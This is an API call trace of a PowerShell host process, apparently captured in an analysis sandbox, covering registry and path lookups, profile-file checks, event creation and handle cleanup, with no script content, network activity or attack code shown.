	[0045.263] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0x184b47cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0045.263] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x184b47cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0045.264] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 0x11
	[0045.266] EtwEventWriteTransfer (RegHandle=0x230150455400c0, EventDescriptor=0x184b47d7f0, ActivityId=0x184b47d670, RelatedActivityId=0x0, UserDataCount=0x0, UserData=0x0) returned 0x0
	[0045.269] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b8970
	[0045.269] GetSystemDirectoryW (in: lpBuffer=0x1505f3b8970, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0045.269] CoTaskMemFree (pv=0x1505f3b8970) 
	[0045.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0045.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0045.269] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d440) returned 1
	[0045.269] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47d520 | out: lpFileInformation=0x184b47d520*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0045.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d400) returned 1
	[0045.269] WldpGetLockdownPolicy () returned 0x0
	[0045.269] GetSystemInfo (in: lpSystemInfo=0x184b47d580 | out: lpSystemInfo=0x184b47d580*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0045.269] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d488 | out: phkResult=0x184b47d488*=0x3d8) returned 0x0
	[0045.270] RegQueryValueExW (in: hKey=0x3d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47d4d8, lpData=0x0, lpcbData=0x184b47d4d0*=0x0 | out: lpType=0x184b47d4d8*=0x0, lpData=0x0, lpcbData=0x184b47d4d0*=0x0) returned 0x2
	[0045.270] RegCloseKey (hKey=0x3d8) returned 0x0
	[0045.270] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d4f8 | out: phkResult=0x184b47d4f8*=0x3d8) returned 0x0
	[0045.270] RegQueryValueExW (in: hKey=0x3d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47d548, lpData=0x0, lpcbData=0x184b47d540*=0x0 | out: lpType=0x184b47d548*=0x1, lpData=0x0, lpcbData=0x184b47d540*=0x56) returned 0x0
	[0045.270] RegQueryValueExW (in: hKey=0x3d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47d548, lpData=0x150479d48b0, lpcbData=0x184b47d540*=0x56 | out: lpType=0x184b47d548*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184b47d540*=0x56) returned 0x0
	[0045.270] RegCloseKey (hKey=0x3d8) returned 0x0
	[0045.270] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d4f8 | out: phkResult=0x184b47d4f8*=0x3d8) returned 0x0
	[0045.270] RegQueryValueExW (in: hKey=0x3d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47d548, lpData=0x0, lpcbData=0x184b47d540*=0x0 | out: lpType=0x184b47d548*=0x1, lpData=0x0, lpcbData=0x184b47d540*=0x56) returned 0x0
	[0045.270] RegQueryValueExW (in: hKey=0x3d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47d548, lpData=0x150479d4cb8, lpcbData=0x184b47d540*=0x56 | out: lpType=0x184b47d548*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184b47d540*=0x56) returned 0x0
	[0045.270] RegCloseKey (hKey=0x3d8) returned 0x0
	[0045.270] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b9410
	[0045.271] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1505f3b9410 | out: pszPath="C:\\Users\\Nd9E1FYi\\Documents") returned 0x0
	[0045.271] CoTaskMemFree (pv=0x1505f3b9410) 
	[0045.271] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents", nBufferLength=0x105, lpBuffer=0x184b47cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents", lpFilePart=0x0) returned 0x1b
	[0045.271] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b9410
	[0045.271] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1505f3b9410 | out: pszPath="C:\\Users\\Nd9E1FYi\\Documents") returned 0x0
	[0045.271] CoTaskMemFree (pv=0x1505f3b9410) 
	[0045.271] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents", nBufferLength=0x105, lpBuffer=0x184b47cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents", lpFilePart=0x0) returned 0x1b
	[0045.275] CoTaskMemAlloc (cb=0x25c) returned 0x1505f3ccd80
	[0045.275] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1505f3ccd80, nSize=0x12c | out: lpBuffer="\x03") returned 0x0
	[0045.275] CoTaskMemFree (pv=0x1505f3ccd80) 
	[0045.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x184b47d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0045.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d4f0) returned 1
	[0045.297] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x184b47d5d0 | out: lpFileInformation=0x184b47d5d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0045.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d4b0) returned 1
	[0045.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x184b47d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0045.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d4f0) returned 1
	[0045.298] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x184b47d5d0 | out: lpFileInformation=0x184b47d5d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0045.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d4b0) returned 1
	[0045.298] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x184b47d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x39
	[0045.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d4f0) returned 1
	[0045.298] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x184b47d5d0 | out: lpFileInformation=0x184b47d5d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0045.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d4b0) returned 1
	[0045.298] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x184b47d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4e
	[0045.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d4f0) returned 1
	[0045.298] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x184b47d5d0 | out: lpFileInformation=0x184b47d5d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0045.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d4b0) returned 1
	[0045.301] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3d8
	[0045.301] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x5b8
	[0045.301] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5bc
	[0045.301] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5c8
	[0045.301] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5ec
	[0045.302] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x5e8
	[0045.302] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5cc
	[0045.302] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5c4
	[0045.302] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5f0
	[0045.302] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x5d8
	[0045.302] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5d4
	[0045.302] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5f4
	[0045.303] GetStdHandle (nStdHandle=0xfffffff6) returned 0x20
	[0045.303] GetFileType (hFile=0x20) returned 0x2
	[0045.306] SetEvent (hEvent=0x5c8) returned 1
	[0045.306] SetEvent (hEvent=0x3d8) returned 1
	[0045.306] SetEvent (hEvent=0x5b8) returned 1
	[0045.306] SetEvent (hEvent=0x5bc) returned 1
	[0045.306] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5e0
	[0045.307] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d338 | out: phkResult=0x184b47d338*=0x5c0) returned 0x0
	[0045.307] RegQueryValueExW (in: hKey=0x5c0, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x184b47d388, lpData=0x0, lpcbData=0x184b47d380*=0x0 | out: lpType=0x184b47d388*=0x0, lpData=0x0, lpcbData=0x184b47d380*=0x0) returned 0x2
	[0045.307] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5d0
	[0045.308] SetEvent (hEvent=0x5d0) returned 1
	[0059.791] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa1c
	[0059.791] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa18
	[0059.791] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9f8
	[0059.791] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa24
	[0059.791] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa2c
	[0059.791] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa34
	[0059.791] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa20
	[0059.791] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa4c
	[0059.791] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa48
	[0059.792] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa50
	[0059.792] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa54
	[0059.792] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa58
	[0059.792] SetEvent (hEvent=0xa24) returned 1
	[0059.792] SetEvent (hEvent=0xa1c) returned 1
	[0059.792] SetEvent (hEvent=0xa18) returned 1
	[0059.792] SetEvent (hEvent=0x9f8) returned 1
	[0059.792] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa5c
	[0059.792] SetEvent (hEvent=0x5d0) returned 1
	[0060.923] SetEvent (hEvent=0xa2c) returned 1
	[0060.923] SetEvent (hEvent=0xa34) returned 1
	[0060.923] SetEvent (hEvent=0xa20) returned 1
	[0061.094] CoCreateGuid (in: pguid=0x184b47c708 | out: pguid=0x184b47c708*(Data1=0x63d1b703, Data2=0x5ded, Data3=0x48d5, Data4=([0]=0xa2, [1]=0x2b, [2]=0x4d, [3]=0xe7, [4]=0xe2, [5]=0x40, [6]=0x47, [7]=0x1c))) returned 0x0
	[0061.096] ReportEventW (hEventLog=0x1505f5b0008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x1504775bd38*="Stopped", lpRawData=0x1504775bba0) returned 1
	[0061.098] SetEvent (hEvent=0x5d0) returned 1
	[0061.376] CloseHandle (hObject=0x5d0) returned 1
	[0061.377] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1
	[0061.379] CoGetContextToken (in: pToken=0x184b47f470 | out: pToken=0x184b47f470) returned 0x0
	[0061.379] IUnknown:QueryInterface (in: This=0x15045551b48, riid=0x7ffbf89265e0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184b47f4a8 | out: ppvObject=0x184b47f4a8*=0x15045551b60) returned 0x0
	[0061.379] IComThreadingInfo:GetCurrentThreadType (in: This=0x15045551b60, pThreadType=0x184b47f580 | out: pThreadType=0x184b47f580*=0) returned 0x0
	[0061.379] IUnknown:Release (This=0x15045551b60) returned 0x0
	[0061.380] CoGetContextToken (in: pToken=0x184b47ef80 | out: pToken=0x184b47ef80) returned 0x0
	[0061.380] IUnknown:QueryInterface (in: This=0x15045551b48, riid=0x7ffbf89265e0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184b47efb8 | out: ppvObject=0x184b47efb8*=0x15045551b60) returned 0x0
	[0061.380] IComThreadingInfo:GetCurrentThreadType (in: This=0x15045551b60, pThreadType=0x184b47f028 | out: pThreadType=0x184b47f028*=0) returned 0x0
	[0061.380] IUnknown:Release (This=0x15045551b60) returned 0x0
	[0061.383] CoGetContextToken (in: pToken=0x184b47ef80 | out: pToken=0x184b47ef80) returned 0x0
	[0061.384] IUnknown:QueryInterface (in: This=0x15045551b48, riid=0x7ffbf89265e0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184b47efb8 | out: ppvObject=0x184b47efb8*=0x15045551b60) returned 0x0
	[0061.384] IComThreadingInfo:GetCurrentThreadType (in: This=0x15045551b60, pThreadType=0x184b47f028 | out: pThreadType=0x184b47f028*=0) returned 0x0
	[0061.385] IUnknown:Release (This=0x15045551b60) returned 0x0
	[0061.415] CoGetContextToken (in: pToken=0x184b47ef80 | out: pToken=0x184b47ef80) returned 0x0
	[0061.415] IUnknown:QueryInterface (in: This=0x15045551b48, riid=0x7ffbf89265e0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184b47efb8 | out: ppvObject=0x184b47efb8*=0x15045551b60) returned 0x0
	[0061.415] IComThreadingInfo:GetCurrentThreadType (in: This=0x15045551b60, pThreadType=0x184b47f028 | out: pThreadType=0x184b47f028*=0) returned 0x0
	[0061.415] IUnknown:Release (This=0x15045551b60) returned 0x0
	[0061.416] CoGetContextToken (in: pToken=0x184b47ef90 | out: pToken=0x184b47ef90) returned 0x0
	[0061.416] IUnknown:QueryInterface (in: This=0x15045551b48, riid=0x7ffbf89265e0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184b47efc8 | out: ppvObject=0x184b47efc8*=0x15045551b60) returned 0x0
	[0061.416] IComThreadingInfo:GetCurrentThreadType (in: This=0x15045551b60, pThreadType=0x184b47f038 | out: pThreadType=0x184b47f038*=0) returned 0x0
	[0061.416] IUnknown:Release (This=0x15045551b60) returned 0x0
	[0061.416] CoUninitialize () 

Thread:
	id = 19
	os_tid = 0xcd4


Thread:
	id = 20
	os_tid = 0xbf8


Thread:
	id = 21
	os_tid = 0xccc

	[0039.115] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0039.115] RoInitialize () returned 0x1
	[0039.115] RoUninitialize () returned 0x0
	[0041.550] CloseHandle (hObject=0x278) returned 1
	[0041.551] CloseHandle (hObject=0x2f8) returned 1
	[0041.551] CloseHandle (hObject=0x2e8) returned 1
	[0044.705] CertFreeCertificateContext (pCertContext=0x1505fba7ea0) returned 1
	[0044.706] CertFreeCertificateContext (pCertContext=0x1505fab36b0) returned 1
	[0047.301] CoGetContextToken (in: pToken=0x184b5ff480 | out: pToken=0x184b5ff480) returned 0x0
	[0047.301] CoGetContextToken (in: pToken=0x184b5ff380 | out: pToken=0x184b5ff380) returned 0x0
	[0047.301] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x1
	[0047.301] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x0
	[0047.301] CertFreeCertificateContext (pCertContext=0x1505fba70a0) returned 1
	[0047.301] RegCloseKey (hKey=0x5c0) returned 0x0
	[0047.302] CertFreeCertificateContext (pCertContext=0x1505fba7da0) returned 1
	[0047.302] CertFreeCertificateContext (pCertContext=0x1505fba7120) returned 1
	[0047.302] CertFreeCertificateContext (pCertContext=0x1505fba69a0) returned 1
	[0047.302] CertFreeCertificateContext (pCertContext=0x1505fba72a0) returned 1
	[0047.302] CertFreeCertificateContext (pCertContext=0x1505fba7c20) returned 1
	[0049.345] CloseHandle (hObject=0x6b0) returned 1
	[0049.345] CloseHandle (hObject=0x680) returned 1
	[0049.345] CloseHandle (hObject=0x68c) returned 1
	[0049.345] CloseHandle (hObject=0x69c) returned 1
	[0049.345] CloseHandle (hObject=0x6a4) returned 1
	[0049.345] CloseHandle (hObject=0x698) returned 1
	[0049.345] CloseHandle (hObject=0x688) returned 1
	[0049.345] CloseHandle (hObject=0x6ac) returned 1
	[0049.345] CloseHandle (hObject=0x694) returned 1
	[0049.346] CloseHandle (hObject=0x6a0) returned 1
	[0049.346] CloseHandle (hObject=0x690) returned 1
	[0050.641] CloseHandle (hObject=0x6d4) returned 1
	[0050.641] CloseHandle (hObject=0x6d0) returned 1
	[0050.641] CloseHandle (hObject=0x6b4) returned 1
	[0050.642] CloseHandle (hObject=0x6bc) returned 1
	[0050.642] CloseHandle (hObject=0x6cc) returned 1
	[0050.642] CloseHandle (hObject=0x6b0) returned 1
	[0050.642] CloseHandle (hObject=0x67c) returned 1
	[0050.642] CertFreeCertificateContext (pCertContext=0x1505fba6b20) returned 1
	[0050.642] CloseHandle (hObject=0x6c8) returned 1
	[0051.846] CloseHandle (hObject=0x6b4) returned 1
	[0051.846] CertFreeCertificateContext (pCertContext=0x1505fba64a0) returned 1
	[0051.846] CloseHandle (hObject=0x6c8) returned 1
	[0051.846] CloseHandle (hObject=0x6e0) returned 1
	[0051.846] CertFreeCertificateContext (pCertContext=0x1505fba71a0) returned 1
	[0051.846] CertFreeCertificateContext (pCertContext=0x1505fba66a0) returned 1
	[0057.538] CoGetContextToken (in: pToken=0x184b5ff480 | out: pToken=0x184b5ff480) returned 0x0
	[0057.538] IUnknown:QueryInterface (in: This=0x15045551c70, riid=0x7ffbf8983520*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184b5ff2a0 | out: ppvObject=0x184b5ff2a0*=0x15045551c90) returned 0x0
	[0057.538] CObjectContext::ContextCallback () returned 0x0
	[0060.927] IUnknown:Release (This=0x15045551c90) returned 0x1
	[0060.927] CloseHandle (hObject=0x8c0) returned 1
	[0060.928] CloseHandle (hObject=0x910) returned 1
	[0060.928] CloseHandle (hObject=0x6ac) returned 1
	[0060.928] CloseHandle (hObject=0x8b0) returned 1
	[0060.928] CloseHandle (hObject=0x8ac) returned 1
	[0060.928] CloseHandle (hObject=0x90c) returned 1
	[0060.928] CloseHandle (hObject=0x8a8) returned 1
	[0060.928] CloseHandle (hObject=0x8a4) returned 1
	[0060.928] CloseHandle (hObject=0x948) returned 1
	[0060.929] CloseHandle (hObject=0x908) returned 1
	[0060.929] CloseHandle (hObject=0x8a0) returned 1
	[0060.929] CloseHandle (hObject=0x8f0) returned 1
	[0060.929] CloseHandle (hObject=0x904) returned 1
	[0060.929] CloseHandle (hObject=0x89c) returned 1
	[0060.929] CloseHandle (hObject=0x944) returned 1
	[0060.929] CloseHandle (hObject=0x694) returned 1
	[0060.929] CloseHandle (hObject=0x8ec) returned 1
	[0060.929] CloseHandle (hObject=0x924) returned 1
	[0060.929] CloseHandle (hObject=0x94c) returned 1
	[0060.929] CloseHandle (hObject=0x6a0) returned 1
	[0060.930] CloseHandle (hObject=0x940) returned 1
	[0060.930] CloseHandle (hObject=0x934) returned 1
	[0060.930] CloseHandle (hObject=0x930) returned 1
	[0060.930] CloseHandle (hObject=0x92c) returned 1
	[0060.930] CloseHandle (hObject=0x928) returned 1
	[0060.930] CloseHandle (hObject=0x93c) returned 1
	[0060.930] CloseHandle (hObject=0x8bc) returned 1
	[0060.930] CloseHandle (hObject=0x898) returned 1
	[0060.930] CloseHandle (hObject=0x8b8) returned 1
	[0060.930] CloseHandle (hObject=0x938) returned 1
	[0060.930] CloseHandle (hObject=0x900) returned 1
	[0060.931] CloseHandle (hObject=0x8c8) returned 1
	[0060.931] CloseHandle (hObject=0x8fc) returned 1
	[0060.931] CloseHandle (hObject=0x920) returned 1
	[0060.931] CloseHandle (hObject=0x690) returned 1
	[0060.931] CloseHandle (hObject=0x8b4) returned 1
	[0060.931] CloseHandle (hObject=0x5c0) returned 1
	[0060.931] CloseHandle (hObject=0x91c) returned 1
	[0060.931] CloseHandle (hObject=0x6d8) returned 1
	[0060.931] CloseHandle (hObject=0x8c4) returned 1
	[0060.932] CloseHandle (hObject=0x6c4) returned 1
	[0060.932] CloseHandle (hObject=0x8f8) returned 1
	[0060.932] CloseHandle (hObject=0x918) returned 1
	[0060.932] CloseHandle (hObject=0x8d0) returned 1
	[0060.932] CloseHandle (hObject=0x914) returned 1
	[0060.932] CloseHandle (hObject=0x6d4) returned 1
	[0060.932] CloseHandle (hObject=0x8f4) returned 1
	[0060.932] CloseHandle (hObject=0x6d0) returned 1
	[0060.932] CloseHandle (hObject=0x6b8) returned 1
	[0060.933] CloseHandle (hObject=0x8cc) returned 1
	[0060.933] CloseHandle (hObject=0x6dc) returned 1
	[0061.381] EtwEventUnregister (RegHandle=0x240150455412d0) returned 0x0
	[0061.381] EtwEventUnregister (RegHandle=0x2501504553f730) returned 0x0
	[0061.381] EtwEventUnregister (RegHandle=0x2601504553fa60) returned 0x0
	[0061.381] EtwEventUnregister (RegHandle=0x3d0150455c2ee0) returned 0x0
	[0061.381] EtwEventUnregister (RegHandle=0x4e01505f3c80e0) returned 0x0
	[0061.387] LocalFree (hMem=0x1505f4336a0) returned 0x0
	[0061.387] LocalFree (hMem=0x1505f434be0) returned 0x0
	[0061.395] CloseHandle (hObject=0x2f0) returned 1
	[0061.405] CloseHandle (hObject=0x5ec) returned 1
	[0061.405] CloseHandle (hObject=0x5c8) returned 1
	[0061.405] CloseHandle (hObject=0x5bc) returned 1
	[0061.405] CloseHandle (hObject=0x5b8) returned 1
	[0061.405] CloseHandle (hObject=0x3d8) returned 1
	[0061.405] CloseHandle (hObject=0x960) returned 1
	[0061.406] CloseHandle (hObject=0xa24) returned 1
	[0061.406] CloseHandle (hObject=0x9f8) returned 1
	[0061.406] CloseHandle (hObject=0xa18) returned 1
	[0061.406] CloseHandle (hObject=0xa1c) returned 1
	[0061.406] CloseHandle (hObject=0xa28) returned 1
	[0061.406] CloseHandle (hObject=0xa5c) returned 1
	[0061.406] CloseHandle (hObject=0xa58) returned 1
	[0061.407] CloseHandle (hObject=0xa54) returned 1
	[0061.407] CloseHandle (hObject=0xa50) returned 1
	[0061.407] CloseHandle (hObject=0xa48) returned 1
	[0061.407] UnmapViewOfFile (lpBaseAddress=0x15046f80000) returned 1
	[0061.408] CloseHandle (hObject=0x408) returned 1
	[0061.408] CloseHandle (hObject=0x8e4) returned 1
	[0061.408] CloseHandle (hObject=0x8e0) returned 1
	[0061.408] CloseHandle (hObject=0x8dc) returned 1
